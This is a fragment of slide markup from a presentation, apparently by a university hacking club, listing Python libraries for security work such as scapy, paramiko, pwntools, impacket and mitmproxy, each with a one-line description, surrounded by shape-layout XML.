            <a:off x="650175" y="1428900"/>
            <a:ext cx="8176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Socket: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Connecting to ports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Subprocess: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 other programs or commands from your python code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Argparse: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specify custom type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converters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for command-line args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Hashlib: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used to hash passwords - useful in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hash cracking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Logging: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record information about program’s execution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Paramiko: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 SSHv2 protocol library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Scapy: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packet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manipulation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tool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Requests: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makes sending HTTP/1.1 requests extremely easy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PwnTools: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used for exploit writing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4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Useful Libraries</a:t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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1019556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19"/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378519" y="343377"/>
            <a:ext cx="271664" cy="459738"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="919476" w="543327">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="543326" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543326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p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8432442" y="343377"/>
            <a:ext cx="394417" cy="459738"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="919476" w="788834">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="788834" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="788834" y="919476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9194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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742448" y="490538"/>
            <a:ext cx="11151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800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D9D9D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DMU HACKERS</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Google Shape;294;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594413" y="702475"/>
            <a:ext cx="62295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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Useful Libraries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295" name="Google Shape;295;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650175" y="1428900"/>
            <a:ext cx="77823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Cryptography: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provides cryptographic recipes and primitives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Dnspython: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provides high and low-level access to the DNS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Impacket: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contains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tools for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remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing and relay attacks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Mitmproxy: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intercepts and modifies HTTP and HTTPS data traffic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Selenium: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automating web testing and browser interactions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●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"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Bs4: </a:t>
            </a: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Beautiful Soup makes it easy to scrape information from web pages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